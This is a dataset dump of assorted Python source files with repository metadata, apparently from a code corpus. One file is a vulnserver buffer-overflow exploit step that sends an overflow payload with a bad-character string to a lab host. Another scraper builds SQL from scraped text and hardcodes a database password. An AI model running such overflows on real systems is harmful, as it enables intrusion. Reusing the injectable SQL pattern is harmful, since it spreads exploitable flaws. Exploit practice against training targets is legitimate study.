Dataset schema (one row per source file):
blob_id: stringlengths 40..40
directory_id: stringlengths 40..40
path: stringlengths 2..616
content_id: stringlengths 40..40
detected_licenses: listlengths 0..69
license_type: stringclasses (2 values)
repo_name: stringlengths 5..118
snapshot_id: stringlengths 40..40
revision_id: stringlengths 40..40
branch_name: stringlengths 4..63
visit_date: timestamp[us]
revision_date: timestamp[us]
committer_date: timestamp[us]
github_id: int64 2.91k..686M (nullable)
star_events_count: int64 0..209k
fork_events_count: int64 0..110k
gha_license_id: stringclasses (23 values)
gha_event_created_at: timestamp[us]
gha_created_at: timestamp[us]
gha_language: stringclasses (213 values)
src_encoding: stringclasses (30 values)
language: stringclasses (1 value)
is_vendor: bool (2 classes)
is_generated: bool (2 classes)
length_bytes: int64 2..10.3M
extension: stringclasses (246 values)
content: stringlengths 2..10.3M
authors: listlengths 1..1
author_id: stringlengths 0..212
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d84af18fe56189733f921cafb5d0b50df6b510f0
|
188fe0297208671994b0b86595777c299868db97
|
/src/sniptly/utils.py
|
4284f010f9fd3e66a38517071dbebcc8ad37baee
|
[
"MIT"
] |
permissive
|
jjaakko/sniptly
|
2e986a51e7a8fa0e64907bab277ea735d47b65ef
|
c8190294f75a7b3db26af40e4b3592b5c5971b91
|
refs/heads/main
| 2023-05-31T22:41:53.398006
| 2020-07-08T14:57:52
| 2021-06-25T12:53:04
| 380,056,593
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
from typing import List
def extensions_to_glob_patterns(extensions: List[str]) -> List[str]:
"""Generate a list of glob patterns from a list of extensions.
"""
patterns: List[str] = []
for ext in extensions:
pattern = ext.replace(".", "*.")
patterns.append(pattern)
return patterns
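# Usage sketch (illustrative, not part of the original file):
#   extensions_to_glob_patterns([".py", ".md"]) -> ["*.py", "*.md"]
# Note the input extensions are expected to include the leading dot.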
|
[
"jaakko.kuurne@gmail.com"
] |
jaakko.kuurne@gmail.com
|
c60cdc9f404197e9f25f6886a5275714e93ab0a6
|
e5d3d68e9353af93875707551d2747617245ffc3
|
/climate/climate_data.py
|
f4be63b690f9dfa1fdda948ff96308128c166dc9
|
[] |
no_license
|
Ryan2718/Python-Projects
|
5686679ba82c0feb7c4155e7a4a2adea51bad1a3
|
2b57abfe19007baaeba86fdd6a1ecd8fc6b1cb9c
|
refs/heads/master
| 2020-06-18T00:00:14.071343
| 2019-07-10T02:00:06
| 2019-07-10T02:00:06
| 196,105,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
# -*- coding: utf-8 -*-
class ClimateData(object):
def __init__(self, monthly_avg_tmps, monthly_avg_precips, hemisphere):
self.monthly_avg_tmps = monthly_avg_tmps # Degree C
self.monthly_avg_precips = monthly_avg_precips # mm
self.hemisphere = hemisphere
|
[
"8814511+Ryan2718@users.noreply.github.com"
] |
8814511+Ryan2718@users.noreply.github.com
|
70eaf35542dd8f1c66ae7cf3d79e7fd989040d4c
|
e6360219ba06194fac1f7ea91cd003f2a3db2ff1
|
/study_3/home_price.py
|
70c87c85c7010e1d2e3b1df1b68437f655c24d18
|
[] |
no_license
|
jianhanke/spider
|
077926c83c3d14ccd233a9a2425d181511578f3b
|
63bf688b6592d1e9dd879728eab84a7c32b73b0a
|
refs/heads/master
| 2020-06-03T02:45:50.597189
| 2019-12-01T05:00:03
| 2019-12-01T05:00:03
| 191,402,230
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,442
|
py
|
import requests
from bs4 import BeautifulSoup
import pymysql
import math
all_div=[]
all_sql=[]
initial_url='https://bj.fang.lianjia.com/loupan/'
r=requests.get(initial_url)
html=r.text
soup=BeautifulSoup(html,'html.parser')
num=soup.find('span',attrs={'class':'value'}).string
page_num=math.ceil(int(num)/10)+1  # number of pages derived from the item count scraped above
for num in range(1,page_num):
url='https://zz.fang.lianjia.com/loupan/bba0eba300pg{}/'.format(num)
r=requests.get(url)
html=r.text
soup=BeautifulSoup(html,'html.parser')
all_div=soup.find_all('div',attrs={'class':'resblock-desc-wrapper'})
for div in all_div:
all_li=div.find_all('div',attrs={'class':'resblock-name'})
price=div.find('span',attrs={'class':'number'}).string
price=" '{}' ".format(price)
address=div.find('div',attrs={'class':'resblock-location'}).find('a').string
address="'{}' ".format(address)
for i in all_li:
one=i.find('a')
url='https://zz.fang.lianjia.com'+one.get('href')
url="'{}' ".format(url)
name=one.string
name="'{}' ".format(name)
sql="insert into zz_home_price (price,name,address,url) values ({},{},{},{})".format(price,name,address,url)
all_sql.append(sql)
print(sql)
# manage the database connection: returns db, cursor
db=pymysql.connect(host='localhost',user='root',password='zhao/980931',port=3306,db='spiders')
cursor=db.cursor()
for i in all_sql:
try:
cursor.execute(i)
db.commit()
except:
pass
|
[
"1340289@qq.com"
] |
1340289@qq.com
|
506d688e20757e0dd1604e8d6ae25f193dfeba46
|
5d2bc0efb0e457cfd55a90d9754d5ced9c009cae
|
/venv/lib/python2.7/site-packages/tests/test_143_BindParamInsertStmtNoneParam.py
|
7f4130ed2b4d3e3e6d5fd8ef375b62d1d15af6c8
|
[] |
no_license
|
michaelp1212/paxton
|
dafe08eca55557d036189d5242e47e89ec15bf2d
|
0bd1da471c3a594c0765a4bc5cd1288404791caf
|
refs/heads/master
| 2021-03-25T07:17:06.523340
| 2020-03-19T01:38:24
| 2020-03-19T01:38:24
| 247,598,121
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,576
|
py
|
#
# Licensed Materials - Property of IBM
#
# (c) Copyright IBM Corp. 2007-2008
#
from __future__ import print_function
import sys
import unittest
import ibm_db
import config
from testfunctions import IbmDbTestFunctions
class IbmDbTestCase(unittest.TestCase):
def test_143_BindParamInsertStmtNoneParam(self):
obj = IbmDbTestFunctions()
obj.assert_expect(self.run_test_143)
def run_test_143(self):
conn = ibm_db.connect(config.database, config.user, config.password)
ibm_db.autocommit(conn, ibm_db.SQL_AUTOCOMMIT_OFF)
insert1 = "INSERT INTO animals (id, breed, name, weight) VALUES (NULL, 'ghost', NULL, ?)"
select = 'SELECT id, breed, name, weight FROM animals WHERE weight IS NULL'
if conn:
stmt = ibm_db.prepare(conn, insert1)
animal = None
ibm_db.bind_param(stmt, 1, animal)
if ibm_db.execute(stmt):
stmt = ibm_db.exec_immediate(conn, select)
row = ibm_db.fetch_tuple(stmt)
while ( row ):
#row.each { |child| print child }
for i in row:
print(i)
row = ibm_db.fetch_tuple(stmt)
ibm_db.rollback(conn)
else:
print("Connection failed.")
#__END__
#__LUW_EXPECTED__
#None
#ghost
#None
#None
#__ZOS_EXPECTED__
#None
#ghost
#None
#None
#__SYSTEMI_EXPECTED__
#None
#ghost
#None
#None
#__IDS_EXPECTED__
#None
#ghost
#None
#None
|
[
"smartwebdev2017@gmail.com"
] |
smartwebdev2017@gmail.com
|
c8851fdcd0ba2ec7377d62611dc383d6a9fc7a29
|
e1184e2b369fd262477faee6ba526529d14bd972
|
/usrosint/modules/money/bymeacoffee.py
|
e8f85f0c98cdcb9f7acaa103ee14cdd3b8ec499a
|
[] |
no_license
|
krishpranav/usr-osint
|
f3cf9d745fe15344c68c6ebde65e4963a6da6a96
|
9f2aba37563d483662997e88df875d7a4b8df3a6
|
refs/heads/master
| 2023-04-10T05:44:53.193444
| 2021-05-03T06:37:01
| 2021-05-03T06:37:01
| 363,646,588
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,302
|
py
|
#!/usr/bin/env python3
# imports
import requests
import time
class BuyMeACoffee:
def __init__(self, config, permutations_list):
self.delay = config['plateform']['buymeacoffee']['rate_limit'] / 1000
self.format = config['plateform']['buymeacoffee']['format']
self.permutations_list = [perm.lower() for perm in permutations_list]
self.type = config['plateform']['buymeacoffee']['type']
def possible_usernames(self):
possible_usernames = []
for permutation in self.permutations_list:
possible_usernames.append(self.format.format(
permutation = permutation,
))
return possible_usernames
def search(self):
buymeacoffee_usernames = {
"type": self.type,
"accounts": []
}
possible_usernames_list = self.possible_usernames()
for username in possible_usernames_list:
            try:
                r = requests.get(username)
            except requests.ConnectionError:
                print("failed to connect to buymeacoffee")
                continue  # without this, `r` would be unbound below
            if r.status_code == 200:
buymeacoffee_usernames["accounts"].append({"value": username})
time.sleep(self.delay)
return buymeacoffee_usernames
|
[
"krisna.pranav@gmail.com"
] |
krisna.pranav@gmail.com
|
b90ea379482b78b1417dc5edfa366466e4debbcc
|
7a183caebc1ec41e108d7d6457952b7848d1cec4
|
/vulnserver/4_vs_test_badchars.py
|
f57ee6c5f8715bf4ca0b23d74ec80a31dc8310b9
|
[] |
no_license
|
charchitt/Exploiting-Simple-Buffer-Overflows-on-Win32
|
b4c0289a0a107f19c927980c3dd11a0fce80b787
|
fd31f914b8dcd59926a6b2fcfe7eda1061d0f0ec
|
refs/heads/master
| 2021-09-10T21:12:52.098548
| 2018-04-02T08:03:23
| 2018-04-02T08:03:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,490
|
py
|
#!/usr/bin/python
import socket
server = '192.168.1.19'
sport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
# root@kali:~/Desktop/exploit_development/tools# ./badchar.py
# Length of badchars = 256
badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
attack = 'A' * 2006 + 'BBBB' + badchars + 'C' * (3000-2006-4-len(badchars))
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
a2e6edfc7aac4240eb34217f1becdb34cd8d5020
|
305703bc970856fb472543842b89f6fcde8c6dae
|
/lib/vnf_util.py
|
74013ca9d51670a6f79600fffed4280827ce7fca
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
whiteslack/vnfproxy-monitor
|
9d78d6fa88a4fddd9998f60fe720598fe38d3ab7
|
198f17ef955f36a360bda3b4fc4941e5fd4986d8
|
refs/heads/master
| 2023-02-09T14:14:27.674372
| 2018-01-15T14:51:34
| 2018-01-15T14:51:34
| 326,210,955
| 0
| 0
|
NOASSERTION
| 2021-01-02T15:25:05
| 2021-01-02T15:24:57
| null |
UTF-8
|
Python
| false
| false
| 748
|
py
|
import sys
sys.path.append('lib')
import os
from charmhelpers.core.hookenv import (
config,
log,
hook_name, action_name, action_tag)
def dump_config():
try:
cfg = config()
log(cfg)
for key in sorted(cfg):
value = cfg[key]
log("CONFIG: %s=%s" % (key, value))
except Exception as e:
log('Dumping config failed:' + str(e), level='ERROR')
def dump_environment():
log("HookName: %s" % hook_name())
log("ActionName: %s" % action_name())
log("ActionTag: %s" % action_tag())
log(os.environ)
def get_real_ip(ip_address_string):
if not ip_address_string:
return None
a = ip_address_string.split(';')[0]
b = a.split(',')[0]
return b
|
[
"jmguzman@whitestack.com"
] |
jmguzman@whitestack.com
|
c11859f6e1d0616857c9b865a1805b79f9b8c7f0
|
1e0c96a0dfe38dec1a455d3bc060db68da1e3775
|
/Labs/lab9/check.py
|
903d4465646cfc4090ecacab1907a4df9122b00a
|
[] |
no_license
|
aakib97/CSE3100-Fall2018
|
9849733b7479398746ba5b01c29ad727c0f3558c
|
ff492efbad26c9965a4ee179824d41805385d164
|
refs/heads/master
| 2020-04-20T13:37:33.803482
| 2019-02-02T20:22:18
| 2019-02-02T20:22:18
| 168,873,695
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,194
|
py
|
#!/usr/bin/python
from __future__ import print_function
from collections import deque
import sys, re
def sys_error(s):
print ("Error: " + s)
sys.exit(1)
# not used
def print_help():
print("Useage: check.py")
sys.exit(0)
ptn_id = re.compile(r'^(Computer|Printer)\s+(\d+)\s')
ptn_job = re.compile(r'job\s+(\d+)')
ptn_summary = re.compile(r'\s(\d+)\s+jobs')
ptn_config = re.compile(r'(jobs|computers|printers|size)=(\d+)')
n_lines = 0
num_jobs = num_computers = num_printers = q_size = 0
computer_total = printer_total = 0
job_count = 0
for line in sys.stdin:
n_lines += 1
# config lines
if n_lines < 5:
# check parameters
m = re.search(ptn_config, line)
if m:
key = m.group(1)
v = int(m.group(2), 0)
if key == 'jobs':
num_jobs = v
elif key == 'computers':
num_computers = v
elif key == 'printers':
num_printers = v
else:
q_size = v
assert num_computers > 0
assert num_printers > 0
assert num_jobs > 0
assert q_size > 0
computers = [0] * num_computers
printers = [0] * num_printers
q = deque([])
else:
sys_error("Not a configuration line.\n"+line)
continue
m = re.search(ptn_id, line)
if not m:
sys_error("Not a computer/printer activity.")
mj = re.search(ptn_job, line)
ms = re.search(ptn_summary, line)
pcid = int(m.group(2))
job = -1
total = -1
if m.group(1) == 'Computer':
if mj:
job = int(mj.group(1))
if job != job_count :
sys_error("Job {} has not been submitted yet.\nline {}:{}{}".
format(job_count, n_lines, line, q))
q.append(job)
computers[pcid] = 0
job_count += 1
elif ms:
computer_total += int(ms.group(1))
continue
else: # wait
if len(q) < q_size and computers[pcid] == 0:
sys_error("Computer should not wait.\nline {}:{}{}".format(n_lines, line, q))
computers[pcid] = 1
else:
if mj:
job = int(mj.group(1))
job2 = q.popleft()
if job != job2:
sys_error("Printer did not fetch the first job in the queue.\nLine {}: {}".
format(n_lines, line))
printers[pcid] = 0
elif ms:
printer_total += int(ms.group(1))
continue
else:
if len(q) > 0 and printers[pcid] == 0:
sys_error("Printer should not wait.\nline {}:{}{}".format(n_lines, line, q))
printers[pcid] = 1
if job > 0 :
print("line {}:{}{}".format(n_lines, line, q))
if len(q) > q_size :
sys_error("The queue has more than {} elements.\n".format(q_size))
#sanity check
print(len(q), num_jobs, computer_total, printer_total)
assert len(q) == 0
assert job_count == num_jobs
assert computer_total == num_jobs
assert printer_total == num_jobs
|
[
"noreply@github.com"
] |
aakib97.noreply@github.com
|
ecd4be1afced3ec620f42586d01fd75dd3af6f6e
|
aa59c25c4f26e56fcccae3d97cd3a06f3b9fdd8f
|
/observatorio/apps/proyecto/models.py
|
3aca9deefaaf0f2c86f470918bae50ca9de4976b
|
[] |
no_license
|
observatorio-app/appobservatorio
|
63c75d2fadb268d5581c1aafe0d73f53ce75845c
|
0f72dfb6bf0857d3671e080c32ce95bdc1ab7195
|
refs/heads/master
| 2020-09-12T22:29:41.975541
| 2016-10-20T23:21:08
| 2016-10-20T23:21:08
| 67,890,241
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,230
|
py
|
from __future__ import unicode_literals
# -*- encoding: utf-8 -*-
from django.contrib.auth.models import User
from django.db import models
class inicioModel(models.Model):
titulo_inicio = models.CharField(max_length = 100)
descripcion_inicio = models.CharField(max_length = 2000)
imagen = models.ImageField(upload_to = 'img/', blank = True, null = True)
def __str__(self):
return self.titulo_inicio
def __unicode__(self):
return self.titulo_inicio
class TipoSolucion(models.Model):
nombre_tipo_solucion = models.CharField(max_length = 80)
def __str__(self):
return self.nombre_tipo_solucion
def __unicode__(self):
return self.nombre_tipo_solucion
class Asesor(models.Model):
nombre_asesor = models.CharField(max_length = 80)
def __str__(self):
return self.nombre_asesor
def __unicode__(self):
return self.nombre_asesor
class Tematica(models.Model):
nombre_tematica = models.CharField(max_length = 80)
def __str__(self):
return self.nombre_tematica
def __unicode__(self):
return self.nombre_tematica
class AnoPublicacion(models.Model):
fecha_publicacion = models.CharField(max_length = 7)
def __str__(self):
return self.fecha_publicacion
def __unicode__(self):
return self.fecha_publicacion
class Programa(models.Model):
nombre_programa = models.CharField(max_length = 150)
def __str__(self):
return self.nombre_programa
def __unicode__(self):
return self.nombre_programa
class Proyecto(models.Model):
nombre_proyecto = models.CharField(max_length = 300)
descripcion_proyecto = models.CharField(max_length = 1500)
nombre_autor = models.CharField(max_length = 80)
asesor = models.ForeignKey(Asesor)
tipo_solucion = models.ForeignKey(TipoSolucion)
area_tematica = models.ForeignKey(Tematica)
fecha_publicacion = models.ForeignKey(AnoPublicacion, default = 1)
fecha_subido = models.DateField(auto_now = True)
codigo_barras = models.CharField(max_length = 100)
codigo_topografico = models.CharField(max_length = 100)
documento = models.FileField(upload_to = 'file/')
usuario = models.ForeignKey(User)
programa = models.ForeignKey(Programa, default = 1)
def __str__(self):
return self.nombre_proyecto
def __unicode__(self):
return self.nombre_proyecto
|
[
"alka65@hotmail.com"
] |
alka65@hotmail.com
|
50a447e509a6ebe7b197517babfbbed9f929b499
|
e4ef71dc9fac6c6e14e756bd08f90fd0be4c2cbc
|
/setup.py
|
30a5c8dbd40c094cb90bb9e07b2bb145d66f783a
|
[] |
no_license
|
kanemathers/gitdeployed
|
83ce202d6871e170d8e4ad387ffa49b0e2dbde67
|
559792a52a8f531e2fbe456d4bdb711b8612b8ee
|
refs/heads/master
| 2021-01-25T07:08:30.495584
| 2013-03-18T12:18:40
| 2013-03-21T23:48:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.md')).read()
CHANGES = open(os.path.join(here, 'CHANGES.txt')).read()
requires = [
'pyramid',
'SQLAlchemy',
'transaction',
'pyramid_tm',
'pyramid_debugtoolbar',
'zope.sqlalchemy',
'waitress',
'gitpython',
'py-bcrypt',
]
setup(name='gitdeployed',
version='0.7',
description='gitdeployed',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='Kane Mathers',
author_email='kane@kanemathers.name',
url='https://github.com/kanemathers/gitdeployed',
keywords='web wsgi bfg pylons pyramid angularjs git service hooks',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='gitdeployed',
install_requires=requires,
entry_points="""\
[paste.app_factory]
main = gitdeployed:main
[console_scripts]
gitdeployed = gitdeployed.scripts.gitdeployed:main
""",
)
|
[
"kane@kanemathers.name"
] |
kane@kanemathers.name
|
42edb0eb2d403f1126c37e4449983680b6cfcb5a
|
7911be298e9076bb5196ef439a9390b753f88bb7
|
/blogz/main.py
|
f3a3fedede0a9e4ba0499dc3592b54da59eea966
|
[] |
no_license
|
hadelesko/build-a-blog
|
8ace8cbe9c904103886db53ce1cb0218b17fd401
|
a001fabaefc25bf1683b0f328190f0ca5cd043b9
|
refs/heads/master
| 2020-03-11T00:12:57.330004
| 2018-04-28T19:10:06
| 2018-04-28T19:10:06
| 129,658,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,731
|
py
|
from flask import Flask, request, redirect, render_template, url_for, session, flash
from flask_sqlalchemy import SQLAlchemy
import cgi
###
# Prototype of redirect() function is as below:
# Flask.redirect(location, statuscode, response)
# In the above function:
# location parameter is the URL where response should be redirected.
# statuscode sent to browser's header, defaults to 302.
# response parameter is used to instantiate response.
###
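# Example (sketch): redirect the client to the login page with the default 302 status:
#   return redirect(url_for('login'))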
app = Flask(__name__)
app.config['DEBUG'] = True
# Note: the connection string after :// contains the following info:
# user:password@server:portNumber/databaseName
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://blogz:password@localhost:3306/blogz'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
app.secret_key = 'danken'
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(120))
password = db.Column(db.String(300))
logged_in = db.Column(db.Boolean)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    blogs = db.relationship('Blogs', backref='owner')
    def __init__(self, username, password):
        self.username = username
        self.password = password
        self.logged_in = False
@app.before_request
def require_login():
allowed_routes = ['login', 'signup']
if request.endpoint not in allowed_routes and 'username' not in session:
return redirect('/login')
@app.route('/login', methods=['POST', 'GET'])
def login():
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
user = User.query.filter_by(username=username).first()
if user and user.password == password:
session['username'] = username
flash("Logged in")
return redirect('/')
else:
flash('User password incorrect, or user does not exist', 'error')
return render_template('login.html')
@app.route('/signup', methods=['POST', 'GET'])
def signup():
if request.method == 'POST':
        username = request.form['username']
password = request.form['password']
# TODO - validate user's data
existing_user = User.query.filter_by(username=username).first()
if not existing_user:
new_user = User(username, password)
db.session.add(new_user)
db.session.commit()
session['username'] = username
return redirect('/')
else:
# TODO - user better response messaging
return "<h1>Duplicate user</h1>"
return render_template('signup.html')
@app.route('/logout')
def logout():
del session['username']
return redirect('/')
@app.route('/', methods=['POST', 'GET'])
def index():
    owner = User.query.filter_by(username=session['username']).first()
if request.method == 'POST':
task_name = request.form['task']
new_task = Task(task_name, owner)
db.session.add(new_task)
db.session.commit()
tasks = Task.query.filter_by(completed=False,owner=owner).all()
completed_tasks = Task.query.filter_by(completed=True,owner=owner).all()
return render_template('todos.html',title="Get It Done!",
tasks=tasks, completed_tasks=completed_tasks)
@app.route('/delete-task', methods=['POST'])
def delete_task():
task_id = int(request.form['task-id'])
task = Task.query.get(task_id)
task.completed = True
db.session.add(task)
db.session.commit()
return redirect('/')
@app.route('/', methods=['POST', 'GET'])
def confirm_signup():
username = request.form['username']
password= request.form['password']
verify_password= request.form['verify_password']
email= request.form['email']
errors = { "username": "", "password": "", "verify_password": "", "email" : ""}
u_error= "" #errors_massage[0] #=(list(errors.values()))[0]
p_error= "" #errors_massage[1] #=(list(errors.values()))[1]
pv_error= "" #errors_massage[2] #=(list(errors.values()))[2]
em_error= "" #errors_massage[3] #=(list(errors.values()))[3]
errors_massage=[]
if len(username)==0 or len(username) not in range(3, 21) or username.find(' ')!=-1:
#errors["username"] = "The '{0}' have not to be empty and has no space.The length has not to be out of the range 3 to 21".format("username")
u_error="The '{0}' have not to be empty and has no space.The length has not to be out of the range 3 to 21".format("username")
errors_massage.append(u_error)
#return u_error
else:
u_error=""
errors_massage.append(u_error)
#return u_error
if len(password) not in range(3, 21) or password.find(' ')!=-1:
#errors["password"] = "The '{0}'length has not to be out of the range 3 to 21".format("password")
p_error= "The '{0}'length has not to be out of the range 3 to 21".format("password")
errors_massage.append(p_error)
#return p_error
else:
p_error=""
errors_massage.append(p_error)
#return p_error
    errors_massage.append(pv_error)
    errors_massage.append(em_error)
    #TODO 1: Fix this later to redirect to '/welcome?username={username}'
if len(errors_massage[0])==0 and len(errors_massage[1])==0 and len(errors_massage[2])==0 and len(errors_massage[3])==0:
#if len(u_error)==0 and len(p_error)==0 and len(pv_error)==0 and len(em_error)==0:
return render_template('confirm.html', email=email, username=username)
#return redirect('/welcome?username=' + )
#case errors == at least field has errors
else:
        return render_template('signup.html', u_error=errors_massage[0], p_error=errors_massage[1], pv_error=errors_massage[2], em_error=errors_massage[3], username=username, email=email)

if __name__ == '__main__':
    app.run()
|
[
"koomiadeh@gmail.com"
] |
koomiadeh@gmail.com
|
6fea38efd9587c0f1c4bc509aa002254a6355839
|
bd882b2eb4cd60d8bf85e3315756115a64df0456
|
/2.1 Concurrent.futures.py
|
4d7ed0b2d56cc49bfb0e4764d3fb9098cd6971d8
|
[] |
no_license
|
nicholas-dinicola/Multiprocessing-Threading
|
821081f20a8c45e1ee2f21227b24b7128136a4ad
|
52d177b1cac8197698fee149865c1baf85a6b328
|
refs/heads/main
| 2023-04-15T00:27:43.067653
| 2021-04-30T12:14:28
| 2021-04-30T12:14:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
import time
import concurrent.futures
start = time.perf_counter()
# USING CONCURRENT.FUTURES
# Create the function and return the values this time as a string
def do_something(seconds):
print(f"Sleeping for {seconds} second...")
time.sleep(seconds)
return f"Done sleeping!... {seconds}"
# Use concurrent futures pool
with concurrent.futures.ProcessPoolExecutor() as executor: # concurrent.futures.ThreadPoolExecutor() for Threading
f1 = executor.submit(do_something, 1)
f2 = executor.submit(do_something, 1)
print(f1.result())
print(f2.result())
finish = time.perf_counter()
print(f"Finished in {round(finish-start, 2)} seconds")
|
[
"noreply@github.com"
] |
nicholas-dinicola.noreply@github.com
|
9a10e0de99d5041d082038eac9a19066c6e33076
|
3666c88c1bb764e3d98bbfd56205c8b988a254f1
|
/INFO1_09_C.py
|
c50a821271e5e0d1a4867aaa18a96b7ab4dc9704
|
[] |
no_license
|
shi-mo/aoj
|
538b97e7d56136df0197ad015cc85c5aa9501ca5
|
b058e77a53163a0ada1425d3966b45b2619e275c
|
refs/heads/master
| 2023-04-02T18:33:43.783422
| 2023-03-20T12:20:37
| 2023-03-20T12:20:37
| 6,807,323
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 140
|
py
|
n = int(input())
q = int(input())
a = [0] * n
for _ in range(q):
k = int(input())
a[k] += 1
print('\n'.join([str(x) for x in a]))
|
[
"yoshifumi.shimono@gmail.com"
] |
yoshifumi.shimono@gmail.com
|
be797f6881585deaade34f37044408d5b9dd06c1
|
cceac4991f4835dd30584f101e02bbc6c42f9e94
|
/conanfile.py
|
9f6ed061c8f9d053b70f5cd1fc82c5cd3a45df4a
|
[
"MIT"
] |
permissive
|
CPP-MULTI-LIB-CONAN-JENKINS-EXAMPLE/ci-LibA
|
d194bb68e51b9b7931483157f8296ff086adeca9
|
f2d0095195807a26514ba9accc05b029c04fc6f7
|
refs/heads/master
| 2021-07-08T01:41:36.125617
| 2020-02-23T22:11:36
| 2020-02-23T22:11:36
| 242,383,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,690
|
py
|
import os
from conans import ConanFile, CMake, tools
class LibA(ConanFile):
name = "LibA"
version = "0.0.1"
default_user = "testuser"
default_channel = "stable"
description = "LibA Test library for ci testing, no dependencies"
url = "https://github.com/CPP-MULTI-LIB-CONAN-JENKINS-EXAMPLE/ci-LibA.git"
license = "MIT"
author = "Frieder Pankratz"
short_paths = True
generators = "cmake"
settings = "os", "compiler", "build_type", "arch"
compiler = "cppstd"
options = {
"shared": [True, False],
"with_tests": [True, False]
}
default_options = {
"shared": True,
"with_tests" : True
}
exports_sources = "include/*","src/*","tests/*", "CMakeLists.txt"
def requirements(self):
if self.options.with_tests:
self.requires("gtest/1.10.0")
def _configure_cmake(self):
cmake = CMake(self)
cmake.verbose = True
def add_cmake_option(option, value):
var_name = "{}".format(option).upper()
value_str = "{}".format(value)
var_value = "ON" if value_str == 'True' else "OFF" if value_str == 'False' else value_str
cmake.definitions[var_name] = var_value
for option, value in self.options.items():
add_cmake_option(option, value)
cmake.configure()
return cmake
def configure(self):
pass
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
|
[
"you@example.com"
] |
you@example.com
|
a64245cbe787503c981ed5ae555557bd8c098130
|
2a3164480da911ee2f3a59cae113c79a8946ff21
|
/auto_ml/train.py
|
a521b44e27dec424589354268866a7421fff4b51
|
[] |
no_license
|
rshekhovtsov/romla
|
8e0f8002f5c972e9631406c6b2a5189749d54630
|
bdf3804eb0b4ac0b0166031c685212e11f2de1f1
|
refs/heads/master
| 2020-03-29T22:08:38.157897
| 2018-10-08T16:05:34
| 2018-10-08T16:05:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,031
|
py
|
import argparse
import os
import pandas as pd
import pickle
import time
from sklearn.linear_model import Ridge, LogisticRegression
from sklearn.preprocessing import StandardScaler
from utils import transform_datetime_features
from auto_ml import Predictor
# use this to stop the algorithm before time limit exceeds
TIME_LIMIT = int(os.environ.get('TIME_LIMIT', 5*60))
def train( args ):
start_time = time.time()
# my auto-ml hyper parameters
    hyper_params_corr_limit = 0.95 # columns whose absolute correlation exceeds corr_limit will be removed
    hyper_params_max_columns = 10 ** 4 # max columns allowed for the dataset
    hyper_params_onehot_max_uniq_values = 100 # max unique values in a column to treat it as a category
df = pd.read_csv(args.train_csv)
